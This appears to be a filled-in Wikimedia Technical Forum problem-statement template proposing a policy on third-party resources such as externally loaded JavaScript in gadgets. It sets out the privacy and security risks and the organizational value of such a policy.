Instructions
- Define the problem or opportunity (WHAT).
- Outline the importance of addressing the problem or opportunity (WHY).
WHAT?
In one sentence, what is the problem or opportunity?
There is no clear Wikimedia policy on the use of third-party resources, especially executable javascript loaded into Wikimedia websites. The absence of such a policy creates security and privacy risks for Wikimedia users, while exposing the Foundation to financial and reputational damage.
Note: The generic term “third-party resources” is purposely used here so as to be able to cover a scope larger than only javascript resources, if needed in the future.
What does the future look like if this is achieved?
- Gadgets makers do not send user information to third parties
- There is a clear policy, cautioning against loading executable javascript
- Exceptionally, for gadgets that interact with third-parties, they have clear privacy notice
- Gadget makers educate their peers regarding third-parties and reference the policy
- WMF avoids reputational damage (example), and financial loss due to privacy violations
What happens if we do nothing?
- There is continued confusion about the handling of third-party resources in Wikimedia projects (eg: T230124).
- Users face real-life safety consequences because ill-intended third parties stood between their data and the Wikimedia platform
- Unmitigated security and privacy risks related to third-party resources are exploited, leading to violation of user's privacy and platform integrity
- Foundation’s reputation is damaged if a user’s privacy or security is compromised as a result of its platform not policing the use of third party resources.
WHY?
Identify the value(s) this problem/opportunity provides. Add links to relevant OKRs.
Rank values in order of importance and be explicit about who this benefits and where the value is.
User Value/Organization Value AND Objective it supports and How
User Value/Organization Value | Objective it supports and How |
Users’ privacy is shielded from external parties, rather than their data being shared without them even knowing it (eg: T275754) | Thriving Movement, especially regarding Safe and Secure Spaces (T-O13-D1) |
Gadget makers and developers are educated and empowered to mitigate privacy risks using the policy | Platform Evolution, especially allowing for the mitigation of risks for both development teams and operational stakeholders, building trust in our development processes (KR3) |
Legal and Security staff do less reviews of gadgets loading third-party resources, since the community enforces the policy upstream | Thriving Foundation - Technical Infrastructure, in particular around decrease in consumption of operational service (Resilience’s KR3). |
Why are you bringing this decision to the Technical Forum?
What about the scope of this problem led you and your team to seek input across departments/organizations?